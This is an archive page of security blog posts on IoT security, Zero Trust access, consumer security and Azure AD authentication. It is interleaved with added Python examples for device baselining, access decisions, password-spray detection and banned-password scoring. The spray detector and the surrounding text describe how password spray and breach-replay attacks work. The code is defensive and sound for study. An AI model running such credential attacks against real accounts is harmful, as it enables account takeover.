Category Archives: Cybersecurity

The AI cybersecurity impact for IoT

I meet with customers around the globe in all sectors: banks with ATM networks, energy companies with critical infrastructure, natural resource companies with remote automated operations, healthcare organizations with medical devices, manufacturing companies with production environments. They all have the same concerns. They want to leverage robotics and automation to grow their businesses and drive efficiency, but they are concerned about the potential for Internet of Things (IoT) based attacks, which is only exacerbated by the global scale of the cloud. It's a good news/bad news problem for companies. Technology has provided them tools for automation at scale, and the cloud is an exceptional delivery vehicle to accelerate digital transformation and growth. Yet there is a growing concern about the security of the sensors that are critical to this business acceleration.

While news coverage of the proliferation of IoT devices and their impact on network and cloud infrastructures has accelerated, artificial intelligence (AI) is also becoming a household word. Organizations are building powerful machine learning engines that analyze massive sets of data at global scale, and AI is increasingly used to augment machine learning to allow machines to learn for themselves and improve the capabilities of the machine learning engine. There has been much research on the topic of AI, and the industry is poised for rapid growth according to MIT and IDC. I encourage you to read the following two articles about their research:

In my last post in this series, I explained how AI will enhance the predictive capabilities of security information and event management solutions. I also wrote about how we will use AI to protect access. In this blog, I'll provide insight into how the security community is working to secure IoT devices today, and how AI will enhance those efforts over time.

The IoT security challenge

Much of the noise and commentary related to the proliferation of IoT devices and their impact on network and cloud infrastructures became a priority after the Mirai botnet attack in 2016 and the realization that any device connected to the internet could be used as a means to attack critical infrastructure and bring down major portions of telecommunications, energy, and other systems we all rely on daily. The consumerization of IoT attacks was a tipping point for both consumers and organizations. While organizations were already down the path of securing their systems against IoT vulnerabilities, the pressure from the board and other non-security executives increased in tandem as understanding and awareness rose.

The business potential of IoT is incredible. However, as cybersecurity experts, there are several questions we must address:

  • How do organizations secure their environments from the potential of an attack, unknown to them, from an IoT device?
  • How do they authenticate what devices are attempting to access their environments?
  • How do they understand the behavior of these devices while they are accessing the environment?
  • How do they quarantine or update these devices to make them safer?
  • How do they digitally transform and take advantage of robotics and modernization, rolling out systems at scale that do not have humans to manage them, without the ability to authenticate or monitor the devices that are embedded in these systems and understand their impact or security threat to their infrastructure?

With this framing, what are the answers? To provide that insight, we need to group IoT devices into two categories: legacy and new. Let's start with new, as this is the easier problem to solve (at least as easy as any security problem is to solve). Today, there are new IoT devices in market with security built in via the engineering process. A great example is Azure Sphere. IoT devices powered by Azure Sphere are built with a hardened chip that is embedded with a secure Linux OS. Our Azure IoT team is already conducting work that senses IoT devices. The ability to build in security as part of the manufacturing process of new IoT devices will definitely assist the industry in the future, but it doesn't solve the hardest problem: legacy IoT devices.

Legacy devices and IoT

Whether your legacy sensors are in manufacturing devices, medical equipment, offshore drilling rigs, the electrical grid, your ATMs, or thermostats in your home, there are known and valid concerns about the security of the devices. Now factor in malware or DDoS and the threat cannot be overstated. The attack surface is massive when you consider that there are at least nine billion IoT sensor devices joining the net every year. These devices are largely manufactured without security in mind, and oftentimes even the default password cannot be changed. Defense in depth is the answer here, as with most other things in security, and there are current and future solutions that will improve the security posture of IoT devices entering an organization's on-premises network or cloud environment.

The traditional vulnerability management companies focus on scanning devices and network environments for vulnerabilities. Vulnerability management will continue to be a critical aspect of IoT security, as the devices can be identified, and a small set of data can potentially be gathered from them. However, the traditional vulnerability management companies were purpose-built for traditional systems, not for IoT device sensing, though they are developing capabilities to handle a more universal set of devices. This has created a market for CyberX and others that were formed largely to address IoT security, particularly in the OT space. These are real solutions that need serious consideration from the market as a defense in depth solution is built for IoT. It's potentially an oversimplification to state that IoT devices are just another device that shouldn't be inherently trusted, but if you take this approach, you will engineer an environment that improves your all-up device security, inclusive of IoT. This is the approach Microsoft is taking around Zero Trust. Read the first of our blog series on Zero Trust strategy to learn more.

The role of AI

In addition to scanning devices, architecting a Zero Trust network and building new solutions via Azure Sphere and secure hardware/hardened OS, there is a need to go further to protect environments built at global scale. This is where I believe AI has a strong use case.

Machine learning engines can be trained to identify devices based on their hardcoded attributes and behavior. AI can further refine these models by allowing sensing engines to autonomously learn over time what is normal behavior for these devices once they are actually on your network. These sophisticated engines are a brilliant resource to augment other controls that are already in place. Machine learning engines that are built to scale and augmented with AI can evolve and learn in real-time and have the capability to build models that can work in milliseconds, allowing a rules engine to block or quarantine devices that are not behaving as expected before they can potentially damage the environment. They can also work together to identify the devices via algorithms and behavioral modeling, regardless of whether they have seen the specific device previously. The behavior of classes of devices or the models that can be built based on device behavior is much more important than the specific device. As the AI models continue to learn, the specifics of a particular device become less important than the application or use case for the device.

Imagine a scenario where a healthcare organization has cardiology devices that provide anonymized information on overall patient health and outcomes from a particular surgical procedure. Such a device will be expected to provide a certain set of data in a certain taxonomy, like heart rate, blood pressure, and blood oxygen count. This data is predictable for the device, and the way the device communicates with the reporting system, whether cloud or network attached, is also predictable. It is thus straightforward to tell when the device is not communicating as expected or the data is not in the expected format; a security organization can then quickly isolate the device for further forensics to determine whether it is somehow corrupted or simply malfunctioning, and take the appropriate steps to repair or replace it.

Take this example further and imagine the same healthcare organization deploys a new class of cardiology devices, perhaps from a new manufacturer or an updated model. The machine learning engine will have a first experience with the new device; however, it will have been trained to learn the normal communication and behavior of the legacy devices. Based on these learnings, the machine learning engine will already have expectations about how the new device communicates and behaves, even though the new device itself is unknown to the machine learning engine. AI will model the expected behavior and can accelerate detection for new devices and new classes of devices, because the AI engine is continually learning on its own and does not need human intervention to program it. AI can also operate at global, cloud scale and provide information in near real-time, so decisioning happens in milliseconds, not moments. We have examples of this related to malware detection, which will be my next blog in this series. Also on my mind for an upcoming blog is how agents can be corrupted, and how AI can quickly identify these corrupt agents and the data itself as a new supply chain threat to AI/machine learning models. But more on that later.
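The two paragraphs above describe the same control twice: score a device against the expected behaviour of its class (fields in the taxonomy, plausible values, the collector it should report to, and its reporting cadence), and isolate it for forensics when it deviates, even if that particular device has never been seen before. The following is an added example of that logic, not Microsoft's, Azure IoT's or any vendor's code; the class baseline, field names, value ranges, collector host and sample messages are all constructed for illustration.

```python
"""Class-level behavioural baselining of IoT telemetry.

Added example (not Microsoft's, Azure IoT's or any vendor's code). A device's
reports are scored against what its *class* of device is expected to send, so
a device the system has never seen is still judged by the behaviour it shares
with known devices of that class. All names and values are constructed.
"""
from dataclasses import dataclass, field
from statistics import mean

# Assumed baseline for one device class: the fields it must report, plausible
# value ranges, the collector it should talk to, and its reporting cadence.
CLASS_BASELINES = {
    "cardiology_monitor": {
        "required_fields": {"heart_rate", "blood_pressure", "spo2"},
        "ranges": {"heart_rate": (20, 250), "spo2": (50, 100)},
        "collector": "telemetry.hospital.example",
        "interval_s": (30, 120),
    },
}


@dataclass
class Verdict:
    device_id: str
    action: str                                  # "allow" or "quarantine"
    reasons: list = field(default_factory=list)


def check_message(msg, baseline):
    """Return the deviations of one telemetry message from the class baseline."""
    problems = []
    payload = msg.get("payload", {})
    missing = baseline["required_fields"] - set(payload)
    unexpected = set(payload) - baseline["required_fields"]
    if missing:
        problems.append(f"missing fields {sorted(missing)}")
    if unexpected:
        problems.append(f"unexpected fields {sorted(unexpected)}")
    for name, (lo, hi) in baseline["ranges"].items():
        value = payload.get(name)
        if isinstance(value, (int, float)) and not lo <= value <= hi:
            problems.append(f"{name}={value} outside [{lo}, {hi}]")
    if msg.get("dest") != baseline["collector"]:
        problems.append(f"reported to unexpected destination {msg.get('dest')!r}")
    return problems


def evaluate_device(device_id, device_class, messages):
    """Decide whether to keep a device on the network or isolate it for forensics."""
    baseline = CLASS_BASELINES.get(device_class)
    if baseline is None:
        return Verdict(device_id, "quarantine", ["no baseline for device class"])
    reasons = []
    for msg in messages:
        reasons.extend(check_message(msg, baseline))
    # Reporting cadence: the mean gap between consecutive reports should sit
    # inside the class's expected interval.
    ts = sorted(m["ts"] for m in messages)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    lo, hi = baseline["interval_s"]
    if gaps and not lo <= mean(gaps) <= hi:
        reasons.append(f"mean report interval {mean(gaps):.0f}s outside [{lo}, {hi}]s")
    reasons = list(dict.fromkeys(reasons))      # de-duplicate, keep order
    return Verdict(device_id, "quarantine" if reasons else "allow", reasons)


def _report(ts, dest="telemetry.hospital.example", **extra):
    """Build one constructed telemetry message; extra keys override defaults."""
    payload = {"heart_rate": 72, "blood_pressure": "120/80", "spo2": 98, **extra}
    return {"ts": ts, "dest": dest, "payload": payload}


# Constructed sample traffic for four devices of the same class.
KNOWN_DEVICE = [_report(0), _report(60), _report(120)]
# Never seen before, but of a known class and behaving like one.
NEW_DEVICE = [_report(0), _report(90), _report(180)]
# Talking to the wrong host, adding a field, and reporting far too often.
SUSPECT_DEVICE = [_report(t, dest="203.0.113.9", uptime=t) for t in (0, 2, 4)]
# Normal on the wire, but one impossible value: a malfunction candidate.
FAULTY_DEVICE = [_report(0), _report(60, spo2=0), _report(120)]

if __name__ == "__main__":
    for dev_id, msgs in [("cardio-07", KNOWN_DEVICE), ("cardio-new-01", NEW_DEVICE),
                         ("cardio-12", SUSPECT_DEVICE), ("cardio-03", FAULTY_DEVICE)]:
        v = evaluate_device(dev_id, "cardiology_monitor", msgs)
        print(dev_id, v.action, v.reasons)
```

The point of keying the baseline on the class rather than the device identifier is the second paragraph's scenario: `cardio-new-01` has no history of its own, yet it is allowed because its schema, destination and cadence match the class. The faulty and suspect devices are both quarantined, but the recorded reasons differ (a single out-of-range value versus a changed destination, an unexpected field and a changed cadence), which is what the forensics step needs in order to distinguish a malfunction from a compromise.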

As I continue to think about use cases for AI that are applicable today and can assist us in solving the largest and most complex security problems, the ability to detect IoT devices based on both their identity and behavior is absolutely a place where there is an opportunity for high value industry impact. This includes what I believe is the most interesting and potentially vulnerable piece of this equation: the data supply chain, where introducing corrupt data sets into a machine learning/AI model can cause corruption on the output and deliberately weaken the ability for AI/machine learning as a security tool. Learn more about how Microsoft is securing the future of AI and machine learning in this new white paper.

As we learn more about these devices and as organizations increase their use of robotic process automation and IoT sensors for multiple applications, we can increase the overall confidence and ability for organizations to modernize and accelerate their transformation. Given the proliferation of IoT devices, this is one of the core scenarios security professionals must provide solutions for now and in the very near future.

The post The AI cybersecurity impact for IoT appeared first on Microsoft Secure.


Radware Blog: Top 6 Threat Discoveries of 2018

Over the course of 2018, Radware’s Emergency Response Team (ERT) identified several cyberattacks and security threats across the globe. Below is a round-up of our top discoveries from the past year. For more detailed information on each attack, please visit DDoS Warriors.

DemonBot

Radware’s Threat Research Center has been monitoring and tracking a malicious agent […]

The post Top 6 Threat Discoveries of 2018 appeared first on Radware Blog.




What CES Can Show Us About Evolving Consumer Security Needs: A Timeline

Appropriately dubbed the ‘Global Stage for Innovation,’ it’s no wonder CES showcases the most cutting-edge consumer technologies coming out in the year ahead. No topic is off the table: attendees will learn more about connected homes, smart cities and self-driving cars, try out shiny new digital health wearables, headsets, and other connected tech, explore AI-driven technologies, and so much more.

Although events like CES showcase breakthrough technologies, interestingly, they also highlight how rapidly new technology is replaced with the next new thing. The rate at which we are treading on new ground is shifting exponentially, and what we see at CES this January might be obsolete in just a few years.

This rapidly changing technological landscape poses a significant predicament to consumers, a ‘digital dilemma’ if you will: as new technologies accelerate and IoT devices that house them progress, new challenges arise with them. This is particularly the case when it comes to security and privacy. And, just as security and products change and adapt, so do our needs and wants as consumers. Those of a teen differ from those of a parent, from those of a baby boomer, and so on. Let’s see how those needs change over time.

A Digital Life Timeline

2015: The Teen Technologist

Born in the late ‘90s, this teen is an everyday gamer, who loves to play games online with friends. They also love their smartphone, mostly for the access to social media. A teen wouldn’t necessarily be concerned with security, so having a comprehensive system built in is crucial.

2021: The Young Professional

Entering the workforce for the first time, the young professional is finally able to buy the gadgets that were once luxuries. They might have two phones; one for work and a personal device. Additionally, they are bringing more connected devices into their home, so the need for a secure home network has become obvious. They are also always on the go and having to connect to public Wi-Fi, so a Virtual Private Network (VPN) should be considered.

2032: The Concerned Parent

Fast forward almost ten years, and the young professional has become a worried parent. Their kids are spending too much time on screens. Having a way to monitor what they are doing on the internet and limit their time online is crucial, and an application that could provide parental controls would be welcomed. Also, as they bring larger, more connected devices into the home, like smart refrigerators and thermostats, they are excited about a platform that will bake in security through the home network.

2038: The Brand Loyalists

The concerned parent has found devices they like and those they do not like. More importantly, they have found brands they love, and they may continue to purchase from them to bring the latest technology into their family’s lives. A comprehensive security system that covers all types of devices is exactly what they would need to keep a layer of protection in place.

2045: The Unacquainted User

At this point in a digital journey, our user has stopped keeping up with trends because things have changed so much, almost to the point where they are unwilling to learn new tech, or are untrusting of it altogether. But the need to maintain their security and privacy is still top of mind, especially as cybercriminals often prey on this demographic as an easy target. A person like this might worry about ransomware, viruses, and identity theft along with protecting their home network.

As you can see, a person’s security and safety needs, desires, and even their devices evolve depending on the moment they are at in their life. With so much in flux, the last thing anyone wants to think about is security, but with the pace of technological change at an all-time high, it’s safe to bet that threats will evolve to keep pace, and so should the ways in which we protect devices. For these reasons, it’s important to leverage a security partner that will keep this in mind and will grow not only with our evolving needs, but with evolving technology, too.

To learn more about consumer security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post What CES Can Show Us About Evolving Consumer Security Needs: A Timeline appeared first on McAfee Blogs.

Delivering security and continuity for the cities of tomorrow

It seems like almost every part of our lives is now being supported by emerging technologies, from predictive analytics and artificial intelligence to the Internet of Things (IoT). First, we had smart phones, then smart watches and now smart cities. Currently, more than half of the world’s population lives in towns and cities, and by 2050 this number could rise to 66 per cent. This is resulting in a growing need for solutions to effectively … More

The post Delivering security and continuity for the cities of tomorrow appeared first on Help Net Security.

Warding off security vulnerabilities with centralized data

This is the second article of a series; the first article is available here.

File access permissions

Having a system that lets you set the proper permissions and prevents unauthorized people from accessing files is important. However, you should expect that human error will lead to unwanted vulnerabilities. Expecting your users to manually set permissions on each file without ever making a mistake is unrealistic and bad for security and compliance. The key to getting … More

The post Warding off security vulnerabilities with centralized data appeared first on Help Net Security.

Insight into the growing problem of highly sophisticated fraud

Sophisticated fraud campaigns are beginning to outwit machine learning solutions, especially the ones that only detect known fraud patterns based on historic loss experience, according to DataVisor.

The median lifetime of IP fraud signals is only 3.5 days

As bad actors begin using modern technologies (even machine learning) in their attacks, enterprises must bolster detection efforts with a complete solution that can also detect new and emerging fraud patterns and detect them early, or risk … More

The post Insight into the growing problem of highly sophisticated fraud appeared first on Help Net Security.

Hackers have become increasingly deft at stealing student data

Data collection is a vital resource for educational institutions across the world, including student records, which contain highly sensitive material such as a student’s name, address and social security number, and often test scores, behavioral assessments, personal health data and more. Research project data at leading universities is a ripe target for cyber criminals and nation states. The 2018 Education Cybersecurity Report shows that out of 17 industries in the U.S., education ranks last in … More

The post Hackers have become increasingly deft at stealing student data appeared first on Help Net Security.

Zero Trust part 1: Identity and access management

Once in a while, a simple phrase captures our imagination, expressing a great way to think about a problem. Zero Trust is such a phrase. Today, I'll define Zero Trust and then discuss the first step to enabling a Zero Trust model: strong identity and access management. In subsequent blogs, we'll cover each capability of a Zero Trust model in detail and how Microsoft helps you in these areas, and end the series by discussing Microsoft's holistic approach to Zero Trust and our framework.

Zero Trust defined: everything is on the open internet

In some ways, the easiest way to think about Zero Trust is to assume everything is on the open internet, even resources we think are safe in our walled gardens. With Zero Trust, we move from the world of implicit assumptions made based on single elements to explicit verification of all elements of access.

Attacks are at an all-time high, and most are effective because of assumptions based on the idea that users are safe on corporate networks. These assumptions may have made sense 25 years ago because only email could flow beyond the corporate network, remote work was rare, and personal device use for work was virtually unheard of.

But even in the early days, hackers took advantage of these assumptions. From abusing dial-in numbers for remote work on FTP servers to stealing credentials for email, attackers have long known that once you have ports facing the outside world, your whole network is out there too.

You may have hardened your external access points by requiring Multi-Factor Authentication (MFA) or certificates to access your VPN, but in our investigations we see time and time again that, either because of new exploits or because of exceptions made to reduce friction with demanding (and sometimes VIP) workers, the assumption "if they are on my network, it's OK" is not good enough.

First step to enable a Zero Trust model: strong identity and access management

When we talk about a Zero Trust model, assuming that all of our users, applications, and machines are on the internet, we move from a model of implicit trust to one of explicit verification, where:

  • Rather than assuming we have a user in a high-assurance session (for example, one that passed MFA) because of the network, we verify the claim explicitly.
  • Instead of assuming the user has a valid machine because of the network, we verify the device explicitly.
  • Instead of allowing access to file shares because the user is on the network, we explicitly classify and encrypt data, and so forth.

Increasingly, everything is on the open internet. When your users access their cloud-hosted email from a personal smartphone in a café on a business trip, virtually all elements of that interaction are outside of your traditional walled garden. The device, network, and application (code and hardware) fall outside and are not in your direct control, but your ability to validate and set policy on them is.

With the many networks, devices, and applications needed in daily business, the only common denominator is the user. This is why we've said "Identity is the control plane." It's critical to establish who the user is as the core of trust for other transactions. If we aren't sure who the user is, no other system access control or security matters. Once we are sure of the user, we can explicitly verify every element of access whether our resources are on-premises, in cloud-hosted servers, or managed by third-party SaaS apps like Office 365.

A robust Zero Trust strategy considers the full context of the session to determine its overall risk: the identity of the user plus the state of their device, the apps they're using, and the sensitivity of the data they're trying to access. It then applies holistic policies that define when to allow, block, or restrict access, or control it by requiring additional authentication challenges such as MFA, limiting functionality such as downloads, or applying compliance controls such as terms of use. This way, a hacker trying to gain access using stolen credentials on an unknown device will be blocked, as will a verified user running a healthy device trying to access data they don't have permission to see. This strategy not only protects against external threats, but it also helps create guardrails so well-meaning employees can use organizational resources responsibly.
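The decision logic that paragraph describes, as an added illustration in Python. This is not Microsoft's code and not Azure AD's policy syntax; the signal names, the three-level risk scale and the rule ordering are assumptions made up for the example. It walks the two scenarios above (stolen credentials on an unknown device; a healthy device reaching for data the user is not permitted to see) plus the step-up and limited-session outcomes:

```python
"""Context-aware access decision in the style of a Zero Trust policy.

Added illustration, not Microsoft code and not Azure AD's policy language.
Every field, risk level and rule below is an assumption for the example.
"""
from dataclasses import dataclass, field


@dataclass
class Session:
    user: str
    credential_valid: bool    # password (or equivalent) checked out
    mfa_satisfied: bool       # a second factor was already presented
    sign_in_risk: str         # "low" | "medium" | "high"  (assumed scale)
    device_registered: bool   # device is known to the tenant
    device_compliant: bool    # device passed health/compliance checks
    app: str
    data_sensitivity: str     # "internal" | "confidential"  (assumed labels)
    authorized: bool          # user is actually permitted for this app/data


@dataclass
class Decision:
    action: str               # "allow" | "block" | "require_mfa" | "limited"
    reasons: list = field(default_factory=list)


def decide(s: Session) -> Decision:
    # 1. Identity first: without a verified credential nothing else matters.
    if not s.credential_valid:
        return Decision("block", ["credential not verified"])
    # 2. Risk reported by the identity system (leaked creds, impossible travel, ...).
    if s.sign_in_risk == "high":
        return Decision("block", ["sign-in risk high"])
    # 3. A correct password from a never-seen device plus any elevated risk is the
    #    stolen-credential pattern: block outright rather than offer a step-up.
    if not s.device_registered and s.sign_in_risk != "low":
        return Decision("block", ["unknown device with elevated sign-in risk"])
    # 4. Authorization is checked explicitly; network location never grants it.
    if not s.authorized:
        return Decision("block", [f"{s.user} is not authorized for {s.app}"])
    # 5. Step-up: confidential data, or an unregistered device, needs a second factor.
    if not s.mfa_satisfied and (s.data_sensitivity == "confidential" or not s.device_registered):
        return Decision("require_mfa", ["step-up authentication required"])
    # 6. A registered, compliant device gets full access; anything else gets a
    #    restricted session (browser only, downloads disabled).
    if s.device_registered and s.device_compliant:
        return Decision("allow", ["registered, compliant device"])
    return Decision("limited", ["device not compliant: browser-only, downloads disabled"])


if __name__ == "__main__":
    stolen = Session("alice", True, False, "medium", False, False, "mail", "internal", True)
    overreach = Session("bob", True, True, "low", True, True, "hr-data", "confidential", False)
    for s in (stolen, overreach):
        d = decide(s)
        print(f"{s.user}: {d.action} ({'; '.join(d.reasons)})")
```

The order of the checks is the point: identity and its risk come first, then explicit authorization, and only then is the device allowed to soften or harden the session. Swapping steps 4 and 5 would let an unauthorized user burn an MFA prompt before being refused.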

Azure Active Directory (Azure AD) provides the strong, adaptive, standards-based identity verification required in a Zero Trust framework. While Azure AD provides intrinsically strong authentication (including automatic adaptive protection against many attacks), it also allows admins to express their access requirements in simple terms. Virtually every aspect of each sign-in (including associated user or session risk) is available to define the conditions under which access policies are applied. A framework of controls such as additional authentication factors, terms of use, limited access, and other session semantics regulates access. This is how the access decision itself is secured in a Zero Trust approach.

Azure AD conditional access applies intelligent policies to signals about users, devices, locations, and apps.

A successful Zero Trust strategy requires seamless and flexible access to applications, systems, and data while maintaining security for both users and the resources they need to do their jobs. It requires being cloud-ready, starting with identity, and then taking steps that will help secure all areas of your environment to:

  • Strengthen your credentials. If users in your identity system are using weak passwords and not strengthening them with MFA, it isn't a matter of if or when you get compromised, just how often you will be compromised.
  • Reduce your attack surface area. To make life harder for hackers, eliminate using older, less secure protocols, limit access entry points, and exercise more significant control of administrative access to resources.
  • Automate threat response. Reduce costs and risks by reducing the time criminals have to embed themselves into your environment.
  • Increase your awareness. Use auditing and logging of security-related events and related alerts to help detect patterns that may indicate internal attacks or attempted or successful external penetration of your network.
  • Enable user self-help. Reduce friction by empowering your users to stay productive, even as you remain vigilant.

Read Five steps to securing your identity infrastructure to learn more.

Next in our series on Zero Trust: keeping data safe

Identity and access management is one important element of your Zero Trust strategy, along with others such as data encryption, analytics, device verification, and automation. In part 2 of our Zero Trust series, we'll talk about keeping data safe as part of your Zero Trust model. To learn more about how identity and access management enable a Zero Trust model, listen to our webcast. For more details about Zero Trust, read Building Zero Trust networks with Microsoft 365.

The post Zero Trust part 1: Identity and access management appeared first on Microsoft Secure.

Step 2. Manage authentication and safeguard access: top 10 actions to secure your environment

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. We will provide advice on activities such as setting up identity management through Active Directory, malware protection, and more. In this post, we explain how to enable single sign-on (SSO) in Azure Active Directory (Azure AD) to manage authentication across devices, cloud apps, and on-premises apps, and then how to set up Multi-Factor Authentication (MFA) to authenticate user sign-ins through a mobile app, phone call, or SMS.

Balancing employee productivity needs with enterprise security begins with protecting identities. Gone are the days when users accessed corporate resources behind a firewall using corporate-issued devices. Your employees and partners use multiple devices and apps for work. They share documents with other users via cloud productivity apps and email, and they switch between personal and work-related apps and devices throughout the day. This has created a world of opportunity for sophisticated cybercriminals.

Hackers know that users often reuse the same weak password across all their accounts. Sophisticated cybercriminals employ several tactics to take advantage of this. Password spray is a method of trying a handful of common passwords against a long list of known accounts, staying under per-account lockout thresholds. In a breach replay, a malicious actor takes a password stolen from one organization and tries it against other services where the user may have reused it. Phishing campaigns trick users into handing over the password directly to the hacker. Azure AD provides several features to reduce the likelihood of all three of these attack methods.
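Password spray has a distinctive shape in sign-in logs, and it is worth seeing that shape rather than just naming the attack. The following is an added example, not Azure AD code: a small detector over constructed sign-in records (CSV layout, thresholds and the sample rows are all assumptions for the example). It flags a source IP that fails against many distinct accounts with only a few attempts each inside a short window, which is the inverse of a brute force against one account, and then reports any account that subsequently succeeded from the same IP:

```python
"""Password-spray detector over sign-in records.

Added example for this post, not Azure AD code.  A spray tries one or two
common passwords against many accounts from the same source, so per-account
lockout never fires; the tell is one source IP failing against many distinct
users with only a few attempts each inside a short window.  The CSV layout,
the thresholds and the sample records are constructed for the example.
"""
import csv
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from io import StringIO

# Constructed sign-in records: timestamp,user,source_ip,result
SAMPLE_LOG = """\
2019-01-07T08:00:01Z,alice@example.com,203.0.113.5,failure
2019-01-07T08:00:09Z,bob@example.com,203.0.113.5,failure
2019-01-07T08:00:17Z,carol@example.com,203.0.113.5,failure
2019-01-07T08:00:26Z,dave@example.com,203.0.113.5,failure
2019-01-07T08:00:34Z,erin@example.com,203.0.113.5,failure
2019-01-07T08:00:41Z,frank@example.com,203.0.113.5,failure
2019-01-07T08:00:49Z,grace@example.com,203.0.113.5,success
2019-01-07T08:01:00Z,henry@example.com,198.51.100.7,failure
2019-01-07T08:01:05Z,henry@example.com,198.51.100.7,failure
2019-01-07T08:01:11Z,henry@example.com,198.51.100.7,failure
2019-01-07T08:01:18Z,henry@example.com,198.51.100.7,failure
2019-01-07T08:01:24Z,henry@example.com,198.51.100.7,failure
2019-01-07T08:01:31Z,henry@example.com,198.51.100.7,success
2019-01-07T08:02:10Z,ivan@example.com,192.0.2.9,failure
2019-01-07T08:02:25Z,ivan@example.com,192.0.2.9,success
"""


def parse_log(text):
    """Parse the constructed CSV into dicts with real datetimes."""
    fields = ["ts", "user", "ip", "result"]
    rows = []
    for r in csv.DictReader(StringIO(text), fieldnames=fields):
        rows.append({
            "ts": datetime.strptime(r["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "user": r["user"].lower(),
            "ip": r["ip"],
            "result": r["result"],
        })
    return rows


def detect_spray(rows, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Return {source_ip: finding} for IPs whose failures inside any `window`
    touch at least `min_users` distinct accounts with <= `max_per_user` tries
    each.  One account hammered from one IP (classic brute force) does not match."""
    by_ip = defaultdict(list)
    for r in rows:
        by_ip[r["ip"]].append(r)
    findings = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda r: r["ts"])
        fails = [r for r in events if r["result"] == "failure"]
        best, start = None, 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:   # slide the window
                start += 1
            per_user = Counter(r["user"] for r in fails[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if best is None or len(per_user) > best["users"]:
                    first, last = fails[start]["ts"], fails[end]["ts"]
                    # A success from the same IP shortly after is the account the spray hit.
                    hits = sorted({r["user"] for r in events
                                   if r["result"] == "success" and first <= r["ts"] <= last + window})
                    best = {"users": len(per_user), "first": first, "last": last, "successes": hits}
        if best:
            findings[ip] = best
    return findings


if __name__ == "__main__":
    for ip, f in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: {f['users']} accounts between {f['first']:%H:%M:%S} and "
              f"{f['last']:%H:%M:%S}; successes: {f['successes'] or 'none'}")
```

In the constructed data, 203.0.113.5 touches six accounts once each and then succeeds as grace, so it is flagged with grace listed as the compromised account; 198.51.100.7 makes five failures against henry alone and is not a spray by this rule (it is the brute-force pattern that lockout already handles). Real sprays are usually spread across many source IPs and over hours or days, so the same logic should also be run keyed on user-agent or ASN and with a wider window.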

Access credentials in the form of email addresses and passwords are the two most compromised data types, at 44.3 percent and 40 percent, respectively.
Source: Dark Reading Date: November 2017

Simplify user access with Azure AD single sign-on

Most enterprise security breaches begin with a compromised user account that makes protecting those accounts a critical priority. If you manage a hybrid environment, the first step is to create a single common identity for all your users. We recommend password hash sync as your primary authentication method if possible. If you use federation services to authenticate users, be sure to enable extranet lockout. You can read about these and other hybrid identity security recommendations in the first blog in this series: Step 1. Identify users: top 10 actions to secure your environment.

One huge advantage of a hybrid deployment is that you can set up SSO. Users already sign in to on-premises resources using a username and password they know. Azure AD SSO lets them use the same set of credentials to access on-premises resources plus Office 365 apps. You can then increase productivity further by extending SSO to more cloud SaaS apps and to on-premises apps published through Azure AD Application Proxy (AppProxy). Cloud-only customers gain the same productivity benefits by setting up SSO across Azure AD, Office 365, and Azure AD-connected cloud applications.

You can use the SSO deployment plan as a step-by-step guide to walk you through the implementation process of adding more apps to your SSO solution.

Strengthen your credentials

Given the frequency with which credentials are stolen, guessed, or phished, both cloud and hybrid customers should enable Azure MFA to add another layer of security to their accounts (Figure 1). MFA protects everything under the SSO identity system, including cloud SaaS and on-premises apps published with AppProxy, significantly decreasing the odds that a compromised identity will result in a security breach.

MFA works by requiring two or more of the following authentication methods:

  • Something you know (typically a password).
  • Something you have (a trusted device that is not easily duplicated, like a phone).
  • Something you are (biometrics).

You can use the MFA deployment plan as a step-by-step guide to walk you through the implementation process.

Figure 1. MFA works by requiring two or more authentication methods.

One of the reasons users select weak or common passwords is that lengthy passwords requiring numbers, letters, and special characters are difficult to remember, especially if they must be changed every few months. Microsoft recommends that you disable these composition and expiry rules and instead prohibit users from choosing common passwords. If you are a hybrid customer, you will need to deploy Azure AD password protection agents on-premises to enable this feature. Azure AD password protection blocks users from choosing globally common passwords and any custom banned terms that you configure (your company name, product names, and so on). If you implement password hash synchronization as a primary or backup authentication method, you will also have access to a leaked credentials report, which lists username and password pairs for your tenant that have been found in public breach dumps and dark-web sources.
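To make the "banned password" idea concrete, here is an added example in Python, not Microsoft's implementation. It follows the publicly documented shape of the Azure AD password protection evaluation in reduced form: normalize the candidate (lower-case, undo common character substitutions), strip banned terms out as substrings, then score what is left, with each banned term worth one point and each remaining character one point and fewer than five points rejecting. The edit-distance fuzzy match is omitted, and the substitution table and banned list are constructed for the example:

```python
"""Banned-password check in the spirit of Azure AD password protection.

Added example; not Microsoft's implementation.  Normalize, strip banned
terms as substrings, score: each term found = 1 point, each remaining
character = 1 point, fewer than MIN_POINTS rejects.  The substitution
table, banned list and threshold are constructed to mirror the public
documentation; the edit-distance fuzzy match is left out.
"""
SUBSTITUTIONS = str.maketrans({"0": "o", "1": "l", "$": "s", "@": "a"})
BANNED_TERMS = ["password", "contoso", "blank", "summer", "welcome"]  # constructed list
MIN_POINTS = 5


def normalize(pw: str) -> str:
    """Lower-case and undo leetspeak substitutions so P@ssw0rd == password."""
    return pw.lower().translate(SUBSTITUTIONS)


def score(pw: str, banned=BANNED_TERMS, personal_terms=()):
    """Return (points, matched_terms).  personal_terms carries tenant- or
    user-specific words (company name, user's own name) that are also banned."""
    remaining = normalize(pw)
    terms = {normalize(t) for t in (*banned, *personal_terms) if t}
    matched = []
    # Longest terms first, so "password" is consumed before a shorter "pass" could be.
    for term in sorted(terms, key=lambda t: (-len(t), t)):
        if term in remaining:
            matched.append(term)
            remaining = remaining.replace(term, "")
    return len(matched) + len(remaining), matched


def is_acceptable(pw: str, **kw) -> bool:
    points, _ = score(pw, **kw)
    return points >= MIN_POINTS


if __name__ == "__main__":
    for candidate in ("C0ntos0Blank12", "P@ssw0rd", "Welc0me$ummer", "correct-horse-battery"):
        pts, hits = score(candidate)
        print(f"{candidate:24s} {pts:2d} points  banned terms: {hits or 'none'}  "
              f"{'accept' if is_acceptable(candidate) else 'reject'}")
```

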